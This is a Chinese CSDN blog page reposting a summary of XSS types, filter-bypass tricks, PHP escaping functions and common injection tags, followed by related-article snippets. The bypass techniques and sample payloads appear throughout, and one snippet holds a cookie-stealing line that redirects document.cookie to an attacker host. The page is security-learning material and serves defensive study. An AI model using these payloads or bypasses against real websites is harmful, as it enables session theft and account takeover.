xss小总结

最新推荐文章于 2022-04-09 09:47:40 发布
最新推荐文章于 2022-04-09 09:47:40 发布
阅读量135 收藏
点赞数
原文链接:http://www.cnblogs.com/Qi-Lin/p/11338206.html
版权

xss漏洞

反射型,存储型,dom型

xss基本过程

根据所在位置构造相应的代码,一般为闭合相应标签,也可以用一些事件来进行触发闭合,如onmouseover=alert() onclick

  • 一些表单可能通过bp截断
  • 一些表单输入可能有限制,可以修改源码设置的长度大小
  • 利用javascript伪协议,如javascript:alert()
  • 如果一些有过滤机制,可以采用双写绕过,编码绕过(转换成16进制绕过,一些编码绕过如unicode),空格绕过,大小写绕过,用%0a,%0d代替空格等
  • 在ie浏览器中``可以闭合双引号
  • 利用css触发,background:url("javascript:alert(document.domain);");只在部分ie中有效
  • 在css中可以利用注释符绕过对一些字符的过滤xss:expres/**/sion(if(!window.x){alert(document.domain);window.x=1;})css中的expression叫做动态属性,后来被取消,一些悬浮的模块可能仍采用此
    较全的绕过总结https://blog.csdn.net/keepxp/article/details/52054388

  • 源:包括协议,主机名,端口号
  • 同源策略:阻止页面的恶意代码去访问非同源的页面
  • domain属性解决因同源策略带来的不同文档的属性共享问题

防御xss的几个函数

  • setcookie,通过将参数设置为true可以使cookie不能被js获取
  • htmlspecialchars,将html标签以实体输出
  • htmlentities与上相同
  • strip_tags将标签去除
  • 可以自定义xss过滤器
  • 应该关注新出现的html标签,可能这些标签还没有被过滤,可能触发xss

xss位置

  • get型url中的xss:如果get提交的参数显示到页面中,可能就有xss漏洞
  • post型表单中的xss:表单提交的数据显示在表单中
  • json中的xss:json是一种轻量级的数据交换格式,易于人阅读和编写,易于网络传输,最常用的格式为键值对
  • 自定义的http头的参数显示在页面中

常用xss注入标签

<script>,定义客户端脚本
<img src=>,规定显示图像的 URL
<body background=>,规定文档背景图像URL
<body onload=>,body标签的事件属性
<input onfocus= autofocus>,form表单的事件属性
<button onclick=>,击键的事件属性
<link href=>,定义外部资源链接
<object data=>,定义引用对象数据的 URL
<svg onload=>,定义SVG资源引用

转载于:https://www.cnblogs.com/Qi-Lin/p/11338206.html

dianmangji9200
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞挖掘
Jim的博客
09-06 987
alert() 弹出个提示框 (确定)  confirm() 弹出个确认框 (确定,取消)  prompt() 弹出个输入框 让你输入东西
XSS编码绕过和防御
weixin_50464560的博客
05-07 9468
第一部分:常用JS测试语句小结 1.0 常用测试语句说明 <script>alert(1)</script>        //这里alert(1)只是为了简单明了,当然可以弹出cookie.把1换成document.cookie即可.<script src=x οnerrοr=alert(1)></script>   //引入x,由于x不存在,触发onerror函数,进行弹框<script src='h
渗透测试-XSS漏洞检测
道阻且长,行则将至。
09-11 1万+
反射型 Low 界面如图所示: 查看后台源码: <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for ...
XSS总结
mingyqf的博客
04-09 845
转至:https://xz.aliyun.com/t/4067 By七友 / 2019-02-16 09:42:00 / 浏览数 38056 安全技术 WEB安全[顶(6)](javascript:) [踩(1)](javascript:) 简述 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的
XSS插入绕过一些方式总结
热门推荐
煜铭2011
05-05 7万+
0x00前言 我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射、存储、DOM这三类,至于具体每个类别的异同之处,本文不做学术介绍,直接介绍实际的插入方式。 0x01 常规插入及其绕过 1 Script 标签 绕过进行一次移除操作: <scr<script&g...
XSS跨站总结
02-09
一篇文档,让你理解XSS跨站攻防的来龙去脉
xss-vuln学习通关总结
最新发布
08-24
XSS漏洞详解】 XSS(Cross-site scripting)是一种常见的网络安全漏洞,主要表现为黑客通过注入恶意脚本到网页中,从而在用户浏览网页时控制用户的浏览器。这种攻击最初因为涉及跨域而得名,但随着JavaScript的...
Web安全之XSS攻击与防御小结
02-23
跨站脚本攻击(CrossSiteScripting),缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。攻击者对含有漏洞的服务器发起...
XSS注入知识点总结.pdf
02-07
该文档是在看网络学习视频总结,从XSS漏洞概述,XSS分类,XSS构造,XSS变形,XSS的利用,XSS的防御进行总结,分章节进行叙述,可作为学习文档。
XSS跨站学习总结
05-23
XSS跨站总结,讲的相对比较全。主要有XSS的简介、形成原因、种类、常用攻击手段与目的外加如何挖掘跨站
XSS 代码总结
bcbobo21cn的专栏
12-08 1万+
XSS跨站测试代码大全 http://www.cnblogs.com/dsky/archive/2012/04/06/2434768.html '>alert(document.cookie) ='>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3
XSS的构造技巧
Killua
03-31 2975
绕过流程:首先应该看页面的源码,提交的地方能否插入标签,如果不能插入标签,看是什么样的标签,比方说是个&lt;input的标签,就去查一下&lt;input的标签有什么可以xss的属性,然后在构造xss测试。因为无法看到后台代码,所以无法知道采用了什么样的过滤规则,真正被提交到服务器的是什么样的代码,这就需要自己测试了。练手网站:https://alf.nu/alert1http://prompt...
XSS初探
GANDALF THE WHITE的博客
12-10 553
1、XSS攻击一般通过留言、电子邮件或者其他途径向受害者发送一个精心构造的恶意URL,当受害者在WEB浏览器上打开该URL的时候,恶意脚本就会在受害者计算机上执行。(别小看这句话,当你真正理解XSS的时候,你会发现,这就是XSS的全部精髓。至少我现在这么认为) 2、一般实例: (1)XSS输入为HTML代码段,使网页不停地刷新,代码为: (2)XSS输入嵌入其它网站连接,代码为:
XSS变形突破
mdp1234的博客
07-29 1206
XSS的变形 1. 大小写转换 可以将payload 进行大小写转化。如: <Img sRc='#' Onerror="alert(/xss/)" /> <a hREf="javaScript:alert(/xss/)">click me</a> 2. 引号的使用---HTML 语言中对引号的使用不敏感.如“ <img src='#' οnerrοr='alert(/xss/)'/> <img src=# οnerrοr=alert(/x..
xss(跨站脚本攻击)详解
lonmar的博客
06-25 5402
xss跨站脚本攻击 读书心得,技术总结
做了一个XSS的闯关游戏,攻略贴上来
yd0str
12-13 8726
游戏地址: http://xss-quiz.int21h.jp 第一关:比较简单,直接输入 http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9 第二关:也相对简单,闭合标签 http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb20
XSS攻击常识及常见的XSS攻击脚本汇总
撸小鱼&奥术猫
04-12 3983
一、什么是XSS? XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。 二、XSS分类 XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS 1、反射型XSS 发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内...
HTML 事件
weixin_30325487的博客
02-11 185
1、HTML 全局事件属性   HTML4 的新特性之一就是可以使 HTML 事件触发浏览器中的行为,比方说当用户点击某个 HTML 元素时启动一段 JavaScript,在 HTML5 中还增加了一些新的事件属性。   HTML 事件就是发生在 HTML 元素上的事情。当在 HTML 页面中使用 JavaScript 时, JavaScript 就可以触发这些事件。HTML 事件可以是浏览器...
XSS漏洞介绍及绕过技术
星落的博客
05-30 1万+
跨站脚本攻击(Cross Site Scriptong),为了不和层叠样式表(Cascading Style Sheels)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面插入恶意Script代码,当用户浏览该页时,嵌入期中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 反射型XSS 存储型XSS DOM型XSS xss盗取cookie 代码 <script>document.location=http://ip/cookie.php?coo..
xss漏洞 pikachu
08-13
在文章中引用的内容提到了关于Pikachu靶场的XSS漏洞学习总结和详解。Pikachu靶场是一个针对XSS漏洞进行训练和测试的平台,它提供了不同级别和类型的XSS漏洞供用户学习和实践。文章中列举了许多关卡,涵盖了反射型XSS...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值